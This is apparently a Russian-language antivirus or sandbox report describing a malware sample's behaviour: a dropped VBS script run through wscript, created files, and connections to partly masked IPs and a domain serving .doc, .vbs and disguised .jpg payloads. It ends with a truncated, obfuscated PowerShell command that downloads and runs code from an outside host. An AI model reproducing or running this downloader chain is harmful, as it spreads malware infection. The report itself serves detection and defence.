Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\atingloverstartingAgai.vBS"
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %APPDATA%\atingloverstartingagai.vbs
Сетевая активность
Подключается к
- 'ho#.fyi':80
- '19#.#.216.148':80
- '91.##.254.29':80
- '91.##.254.194':80
TCP
Запросы HTTP GET
- http://ho#.fyi/GlE9x
- http://19#.#.216.148/uh.ee.uh.ee.uhuheee.doc
- http://19#.#.216.148/datingloverstartingAgain.vbs
- http://91.##.254.29/Users_API/BrainiacMAX/file_fajm3qaz.kne.txt
- http://91.##.254.194/imge/new-image_v.jpg
UDP
- DNS ASK ho#.fyi
Другое
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "&( $pSHoME[4]+$PSHomE[34]+'x')((('bXKlink = bGJhttp://'+'91.##.254.194/imge/new-ima'+'ge_v.jpgbGJ; bXKwebClient = New'+'-Object System.Net.WebClient; try { bXKdownloaded'+'Data = bXKw... (со скрытым окном)
